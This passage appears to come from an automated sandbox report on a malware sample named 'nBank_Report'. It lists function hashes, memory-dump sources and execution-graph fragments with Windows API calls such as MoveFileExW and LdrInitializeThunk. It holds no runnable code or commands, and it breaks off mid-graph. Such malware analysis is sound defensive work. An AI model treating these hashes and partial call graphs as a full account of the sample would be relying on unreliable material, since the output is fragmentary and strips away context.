                                                • Opcode Fuzzy Hash: 71f4e97904150f45e097cb400a17c87d4075cf2a146f5c44de14dc3572699646
                                                • Instruction Fuzzy Hash: 39F06271404794AEEB248A19D9C4B66FFA8EB81638F18C55AED484E286C3799844CA71

                                                Non-executed Functions

                                                Function 0155DE4C Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477119935.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1550000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d37b7b515a05b20f80eeb4da7ba2f09ee21003f43646b19cce85daed8e631dd5
                                                • Instruction ID: 128d358b6e46ab45f46820b42f72369505dd25083b460fbcefa2fc54830f7a92
                                                • Opcode Fuzzy Hash: d37b7b515a05b20f80eeb4da7ba2f09ee21003f43646b19cce85daed8e631dd5
                                                • Instruction Fuzzy Hash: AAA17E32E0021A8FCF15DFB4C9945AEBBB2FF94300B15856BE905AF265DB71E945CB40

                                                Execution Graph

                                                Execution Coverage:15.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:26.9%
                                                Total number of Nodes:26
                                                Total number of Limit Nodes:1
                                                execution_graph 23066 293ced8 23067 293cee4 23066->23067 23073 293ed89 23067->23073 23068 293cf21 23078 6795660 23068->23078 23083 6795650 23068->23083 23069 293cf98 23074 293ed26 23073->23074 23075 293ed92 23073->23075 23074->23068 23088 293e314 23075->23088 23079 6795682 23078->23079 23080 679574e 23079->23080 23092 679c230 23079->23092 23096 679c614 23079->23096 23080->23069 23084 6795654 23083->23084 23085 679574e 23084->23085 23086 679c230 LdrInitializeThunk 23084->23086 23087 679c614 LdrInitializeThunk 23084->23087 23085->23069 23086->23085 23087->23085 23090 293f0c0 MoveFileExW 23088->23090 23091 293ee65 23090->23091 23091->23068 23095 679c261 23092->23095 23093 679c3c1 23093->23080 23094 679c751 LdrInitializeThunk 23094->23093 23095->23093 23095->23094 23099 679c4cb 23096->23099 23097 679c751 LdrInitializeThunk 23098 679c769 23097->23098 23098->23080 23099->23097

                                                Executed Functions

                                                Function 0679C230 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0fc28f6772346c72e16b79189bd22b5d4efe691dd2c3d545edd9cb52d4832c2e
                                                • Instruction ID: 44570563de007685f5598f6f86a2c839337be819832203cc53c377f8217e6dd9
                                                • Opcode Fuzzy Hash: 0fc28f6772346c72e16b79189bd22b5d4efe691dd2c3d545edd9cb52d4832c2e
                                                • Instruction Fuzzy Hash: AEF1E2B4E00218CFDB54DFA9D884B9DBBF2BF89304F5081A9E448AB395DB749985CF50
                                                Function 06793198 Relevance: .7, Instructions: 709COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd77bae20b6a545c2052ef574d9aa4e022ab9244f9758a1bab0b3c39741a37ee
                                                • Instruction ID: fd3e70f214df24a35e2f4813a2acd893fc399b208c47c8f52d48d925a459a644
                                                • Opcode Fuzzy Hash: bd77bae20b6a545c2052ef574d9aa4e022ab9244f9758a1bab0b3c39741a37ee
                                                • Instruction Fuzzy Hash: 5072BE74E012288FEB64DF69D884BE9BBF2BB49310F5481E9D409A7355EB349E81CF50
                                                Function 06795660 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3497e58a84cb89df7d524a23ff5d40776320e31bdae80d0556751434d2a6c86e
                                                • Instruction ID: 3e58e3e93125b3515b5b2542ceb932caa82d0dbb189df4cdd5b0b624dd899b81
                                                • Opcode Fuzzy Hash: 3497e58a84cb89df7d524a23ff5d40776320e31bdae80d0556751434d2a6c86e
                                                • Instruction Fuzzy Hash: 16C19F74E01218CFEB54DFA5D984B9DBBB2FF89300F2080A9D809AB355DB359A81CF51
                                                Function 067944E0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 209d5fd6289623a2ff7e602e10d2926f08af1a9b0f485324dc6d758d5fdbbe80
                                                • Instruction ID: 370f9640750d878b907bb2d9520cd0de71d8f8e308a3a407d6a7d2cd1ee4ed43
                                                • Opcode Fuzzy Hash: 209d5fd6289623a2ff7e602e10d2926f08af1a9b0f485324dc6d758d5fdbbe80
                                                • Instruction Fuzzy Hash: CBC18D74E01218CFDB54DFA5D994B9DBBF2EF89300F2080A9D809AB355DB359A81CF51
                                                Function 06795AB0 Relevance: .2, Instructions: 227COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6a47ba48df6d9085100255c82a7265946a5cff9e8b3adf3eb1a3ea23a01b7772
                                                • Instruction ID: 7bd0d7a22d362686c49b30453ff0f2d301563a2e90dc6246851d559704b6d2cb
                                                • Opcode Fuzzy Hash: 6a47ba48df6d9085100255c82a7265946a5cff9e8b3adf3eb1a3ea23a01b7772
                                                • Instruction Fuzzy Hash: C0A10470D002188FEB14DFA9D844B9DBBF1FF49304F248269E509AB3A1DB749985CF65
                                                Function 06795AC0 Relevance: .2, Instructions: 220COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d07897939673e18123257f922136da9ada7343d18d01b9b62718b3aa5994b0b9
                                                • Instruction ID: 87543bf37aed5769a6b94f741c2190906eced5c6e211ef9f7f7db8d7bc774d89
                                                • Opcode Fuzzy Hash: d07897939673e18123257f922136da9ada7343d18d01b9b62718b3aa5994b0b9
                                                • Instruction Fuzzy Hash: A6A10470D00218CFEB14DFA9D848B9DBBF1FF49304F208269E519AB2A1DB749985CF65
                                                Function 06795E06 Relevance: .2, Instructions: 202COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e124453e82e98d1739a27714ce457e563a2ef4bb3589fc340e6e721c1d8c2ee2
                                                • Instruction ID: da3c466e1de34ab4f8bd9c5b50a8275f4a861151630a470e55b3ab6915491502
                                                • Opcode Fuzzy Hash: e124453e82e98d1739a27714ce457e563a2ef4bb3589fc340e6e721c1d8c2ee2
                                                • Instruction Fuzzy Hash: 5191E370D00218CFEB50DFA8D888BACBBF1FF49314F208259E519AB291DB759985CF65
                                                Function 0293F018 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 162COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1264 293f018-293f020 1266 293f022-293f024 1264->1266 1267 293f047-293f11f 1264->1267 1268 293f026-293f028 1266->1268 1269 293f02a-293f030 1266->1269 1284 293f133-293f13e 1267->1284 1285 293f121-293f130 1267->1285 1268->1269 1270 293f032-293f035 1268->1270 1271 293f043-293f046 1269->1271 1273 293f037-293f039 1270->1273 1274 293f03b-293f03c 1270->1274 1273->1271 1274->1271 1286 293f152-293f1a5 MoveFileExW 1284->1286 1287 293f140-293f14f 1284->1287 1285->1284 1288 293f1a7-293f1ad 1286->1288 1289 293f1ae-293f1ec 1286->1289 1287->1286 1288->1289
                                                APIs
                                                • MoveFileExW.KERNELBASE(?,?,?,?), ref: 0293F195
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3867182874.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2930000_nBank_Report.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID: Hq
                                                • API String ID: 3562171763-1594803414
                                                • Opcode ID: 72724dbd4e9e3f2539a05706329fbd22081a62694ec1567ce4e908e10ec51c39
                                                • Instruction ID: 9a5831ae5ff2537c842add10ee85591344c758dbbe955b97318245c8b1cd264c
                                                • Opcode Fuzzy Hash: 72724dbd4e9e3f2539a05706329fbd22081a62694ec1567ce4e908e10ec51c39
                                                • Instruction Fuzzy Hash: 3051F274E00208DFDB14CFA9D984AAEBBF6FF89304F24906AE409B7350D734A946CB54
                                                Function 0293E311 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                Download Yara Rule
                                                APIs
                                                • MoveFileExW.KERNELBASE(?,?,?,?), ref: 0293F195
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3867182874.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2930000_nBank_Report.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID:
                                                • API String ID: 3562171763-0
                                                • Opcode ID: 222e7cbe8dba04875454a4d3fb4cccffae7e2ee9a142f2b89b1354b9a5626876
                                                • Instruction ID: 597a4535c6f50b03848210b9d916be7a1eed1d3df94f07818bf988f25523db24
                                                • Opcode Fuzzy Hash: 222e7cbe8dba04875454a4d3fb4cccffae7e2ee9a142f2b89b1354b9a5626876
                                                • Instruction Fuzzy Hash: 66418AB4D042589FCB10CFA9D984ADEFBF5BF49314F14806AE418BB220D774A946CB54
                                                Function 0293E314 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                Download Yara Rule
                                                APIs
                                                • MoveFileExW.KERNELBASE(?,?,?,?), ref: 0293F195
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3867182874.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2930000_nBank_Report.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID:
                                                • API String ID: 3562171763-0
                                                • Opcode ID: 69ef7db930ba2ae7f2cefa4312275c0779c9f281fe93ddc0af31342448e62db9
                                                • Instruction ID: 26fbc2362583c03776778ebb35eb6ead508b50688713f3e2ccb8dabbbb2b755e
                                                • Opcode Fuzzy Hash: 69ef7db930ba2ae7f2cefa4312275c0779c9f281fe93ddc0af31342448e62db9
                                                • Instruction Fuzzy Hash: 474179B4D012589FCB10CFA9D984ADEFBF5BB49314F14802AE818B7220D774A946CB54
                                                Function 0293F0B9 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                Download Yara Rule
                                                APIs
                                                • MoveFileExW.KERNELBASE(?,?,?,?), ref: 0293F195
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3867182874.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2930000_nBank_Report.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID:
                                                • API String ID: 3562171763-0
                                                • Opcode ID: f126a490d9972757f5496512535c8c8026496af2c5d91da482328612cec0361d
                                                • Instruction ID: b92ad3437adf68ac7ee5124c0e3ac6e2ff1df32a6b998b9246b22434eca8aa83
                                                • Opcode Fuzzy Hash: f126a490d9972757f5496512535c8c8026496af2c5d91da482328612cec0361d
                                                • Instruction Fuzzy Hash: E34178B4D012589FCB10CFA9D984ADEFBF5BF49314F24802AE858AB260D774A946CF54
                                                Function 0679C614 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrInitializeThunk.NTDLL(00000000), ref: 0679C756
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d1c0830e62ae253bade0710c49c416fc0ef05c1ab5a068b1aa16c8cd6ed35466
                                                • Instruction ID: 80828b776fd53ccd393ae1e0fbf14a129b36c5904532369a64010b2c6c41e0a1
                                                • Opcode Fuzzy Hash: d1c0830e62ae253bade0710c49c416fc0ef05c1ab5a068b1aa16c8cd6ed35466
                                                • Instruction Fuzzy Hash: 15117974E002098FEF45DFA8E984AFDBBF5FB88304F648165E904E7282D730A941CB64
                                                Function 00EAD4F0 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3866403696.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ead000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05033b4aa34bc31b956574c66cff5da2fcd2332c746531457a525643b5759b2b
                                                • Instruction ID: 9458743ed213ed41222a79d91066aeabd5c5b06ab32611107ebb753d65d703cd
                                                • Opcode Fuzzy Hash: 05033b4aa34bc31b956574c66cff5da2fcd2332c746531457a525643b5759b2b
                                                • Instruction Fuzzy Hash: CB2133B1908204DFDB05DF10D8C0F26BF61FB9D318F208569E80A1F656C336E856CAA2
                                                Function 00EBD044 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3866504978.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ebd000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a670ab85207dddeacd224b8a1f764d2e8d42d6e242d82f96664f66c9b2473833
                                                • Instruction ID: 884f4112321cf28b6ea5bcd8358e3ffdcf59a1fb6fad5f580635204495f035a3
                                                • Opcode Fuzzy Hash: a670ab85207dddeacd224b8a1f764d2e8d42d6e242d82f96664f66c9b2473833
                                                • Instruction Fuzzy Hash: 022122715083049FDB14EF24DCC0B67BB66FB84318F20C5A9E8491B242D73AD847CB62
                                                Function 00EBD204 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3866504978.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ebd000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3f6490a07ed076779cbfeb3ef761663abf38b1d1895de378ef95670f20b742d5
                                                • Instruction ID: 0cdc16b8fe8f771cf39a56435334e6473815104c0753c423ca231dd79b461a29
                                                • Opcode Fuzzy Hash: 3f6490a07ed076779cbfeb3ef761663abf38b1d1895de378ef95670f20b742d5
                                                • Instruction Fuzzy Hash: F3213871508384DFDB15DF10DDC0BA7BB65FB88324F24C569E8092B252D37AD846CAA2
                                                Function 00EBD3B4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3866504978.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ebd000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 291609301444da19f630f911aba6e7181b4f212956f5b8680be795d58b43f22b
                                                • Instruction ID: 6b80a6d10006694eb137a6dbdcf3ee223562c07749190d436bdefe19fcee7fb2
                                                • Opcode Fuzzy Hash: 291609301444da19f630f911aba6e7181b4f212956f5b8680be795d58b43f22b
                                                • Instruction Fuzzy Hash: 4D213471508304DFDB05DF10D9C0B66BBB5FB84318F20C5ADE80A5B292D33AE846CB62
                                                Function 00EAD4EB Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3866403696.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ead000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: a3c398675ce79ffb050acf47262ecc6bb0ec643ff396a6483a3862ff58ce6e66
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: 9011D376908240CFCB15DF10D9C4B16BF71FB99318F24C5A9D80A1F656C336E85ACBA1
                                                Function 00EBD3AF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3866504978.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ebd000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction ID: 777308fc7287eb520b24598a47956150beda7c1f5e8c9bdff84c7fb31722b41b
                                                • Opcode Fuzzy Hash: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction Fuzzy Hash: 3A119D75508280DFCB06CF10D9C4B56BFB1FB85318F24C6A9D8494B656C33AE85ACBA1
                                                Function 00EBD03F Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3866504978.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ebd000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction ID: 2b04da6ee9a9cdda38264a3b7174c57ad6c172593394e00fd242381157627d58
                                                • Opcode Fuzzy Hash: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction Fuzzy Hash: A311DD75508284CFCB15DF14D9C4B16BFA2FB84318F24C6A9D8494B256C33AD84ACF62
                                                Function 00EBD1FF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3866504978.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ebd000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fcc7b76233ba9704f987b25b3189605da9f378fcd960415197fba76abc6c46a8
                                                • Instruction ID: 3c5e716425d9324cd5da27e120ed142cfd9a2a6a9eedbef82874ffa70370fee7
                                                • Opcode Fuzzy Hash: fcc7b76233ba9704f987b25b3189605da9f378fcd960415197fba76abc6c46a8
                                                • Instruction Fuzzy Hash: AE11C475508284CFDB11CF10D9C4B56FF71FB84324F24C6A9D8495B656C33AD806CBA1

                                                Non-executed Functions

                                                Function 06792698 Relevance: .6, Instructions: 604COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18bc009e93efc8a0c17672e255bb9784cbe300dbf5d9be5ed3cd079b03ca6a19
                                                • Instruction ID: fcb2eb449d305cbe04df3f5c19916ff25bdbb53b148bc1a58046195f5cf8f8c9
                                                • Opcode Fuzzy Hash: 18bc009e93efc8a0c17672e255bb9784cbe300dbf5d9be5ed3cd079b03ca6a19
                                                • Instruction Fuzzy Hash: F4627B74E01228CFDB64DF69D884B9EBBB2BF89300F1085E9D409AB255DB359E85CF50
                                                Function 06795200 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 50f97fefc18ea6cf2af62ad2df085738b62f7a48d546fd9db2e7684a132cd251
                                                • Instruction ID: 4ab1b196bf1dd3157b75305105809a4d748b672b3db0d778faba81577862b12e
                                                • Opcode Fuzzy Hash: 50f97fefc18ea6cf2af62ad2df085738b62f7a48d546fd9db2e7684a132cd251
                                                • Instruction Fuzzy Hash: 45C19F74E01218CFEB54DFA5D984B9DBBB2FF89300F2080A9D809AB355DB359A81CF51
                                                Function 06794DA0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8b21ba617e810c431f9ce14bf2831b47f535a02b661f29d8d83e9680aadee8f
                                                • Instruction ID: 4a02a1a207b21cd64e440c38b0897efd4669bffce6f8e3a9d3f7c49ad206ce93
                                                • Opcode Fuzzy Hash: d8b21ba617e810c431f9ce14bf2831b47f535a02b661f29d8d83e9680aadee8f
                                                • Instruction Fuzzy Hash: 68C19E74E01218CFEB54DFA5D994B9DBBB2FF89300F2080A9D809AB355DB359A81CF51
                                                Function 06794940 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aaf7757ac82a614996f632823041d57ef89448f2cce613d2307cbe0b49a049fb
                                                • Instruction ID: b21be397169c6d723bae578effaaff55d2e47fba0f9619763154a6ba68516ce0
                                                • Opcode Fuzzy Hash: aaf7757ac82a614996f632823041d57ef89448f2cce613d2307cbe0b49a049fb
                                                • Instruction Fuzzy Hash: D9C19D74E01218CFDB54DFA5D984BADBBB2EF89304F2080A9D809AB355DB359A81CF51
                                                Function 0679F988 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b8b39b7d53bdb7a1e1c02459c24eb43bd6bc9eaab5f0eeab6b7baa600f68dc1
                                                • Instruction ID: 030d58d82509a6a149fdb28a7bd417f3a0f9a0a71a4c028f224e0408fce79b6e
                                                • Opcode Fuzzy Hash: 4b8b39b7d53bdb7a1e1c02459c24eb43bd6bc9eaab5f0eeab6b7baa600f68dc1
                                                • Instruction Fuzzy Hash: EDC18F74E01218CFEB54DFA5D994B9DBBB2FF89304F2080A9D809AB355DB359A81CF50
                                                Function 06792CDB Relevance: .2, Instructions: 193COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 373e12079de84e16b1daed8fcfcf5678e79cebb962a6103341a69be4e1c8b4b0
                                                • Instruction ID: a389ffcb3c113dc412be2081b0fa2d0181e09139a96a7b4ecdc2df4ab61f1dc7
                                                • Opcode Fuzzy Hash: 373e12079de84e16b1daed8fcfcf5678e79cebb962a6103341a69be4e1c8b4b0
                                                • Instruction Fuzzy Hash: D6A18D74A01228DFDB65DF24D894BEABBB2BF4A301F1085E9D40AA7351DB319E81CF51
                                                Function 06792EBD Relevance: .1, Instructions: 116COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3884625309.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6790000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 90c98c16ffff5d200c1167de92bc6c9051e2abfb87bea58842eb538253f452f6
                                                • Instruction ID: 23618388c2274510e010a946dda377bb1202f8d71cb9050090aacb2b9bcf9ce5
                                                • Opcode Fuzzy Hash: 90c98c16ffff5d200c1167de92bc6c9051e2abfb87bea58842eb538253f452f6
                                                • Instruction Fuzzy Hash: AC519374A41228DFDB65DF24D894BA9B7B2FF4A301F5085E9D40AA7350CB359E81CF50

                                                Execution Graph

                                                Execution Coverage:7.6%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:81
                                                Total number of Limit Nodes:8
                                                execution_graph 20954 73a24a8 20955 73a2633 20954->20955 20956 73a24ce 20954->20956 20956->20955 20959 73a2b28 20956->20959 20962 73a2b30 PostMessageW 20956->20962 20960 73a2b30 PostMessageW 20959->20960 20961 73a2b9c 20960->20961 20961->20956 20963 73a2b9c 20962->20963 20963->20956 20964 135d340 20965 135d386 GetCurrentProcess 20964->20965 20967 135d3d1 20965->20967 20968 135d3d8 GetCurrentThread 20965->20968 20967->20968 20969 135d415 GetCurrentProcess 20968->20969 20970 135d40e 20968->20970 20971 135d44b 20969->20971 20970->20969 20972 135d473 GetCurrentThreadId 20971->20972 20973 135d4a4 20972->20973 20974 1354668 20975 135467a 20974->20975 20976 1354686 20975->20976 20980 1354779 20975->20980 20985 1353e34 20976->20985 20978 13546a5 20981 135479d 20980->20981 20989 1354879 20981->20989 20993 1354888 20981->20993 20986 1353e3f 20985->20986 21001 1355cb8 20986->21001 20988 135709e 20988->20978 20991 13548af 20989->20991 20990 135498c 20991->20990 20997 13544b4 20991->20997 20994 13548af 20993->20994 20995 135498c 20994->20995 20996 13544b4 CreateActCtxA 20994->20996 20996->20995 20998 1355918 CreateActCtxA 20997->20998 21000 13559db 20998->21000 21002 1355cc3 21001->21002 21005 1355cf8 21002->21005 21004 135718d 21004->20988 21006 1355d03 21005->21006 21009 1355d28 21006->21009 21008 1357262 21008->21004 21010 1355d33 21009->21010 21013 1355d58 21010->21013 21012 1357365 21012->21008 21014 1355d63 21013->21014 21017 13588cb 21014->21017 21019 135ab71 21014->21019 21015 1358909 21015->21012 21017->21015 21023 135cc61 21017->21023 21028 135afa1 21019->21028 21032 135afb0 21019->21032 21020 135ab86 21020->21017 21024 135cc91 21023->21024 21025 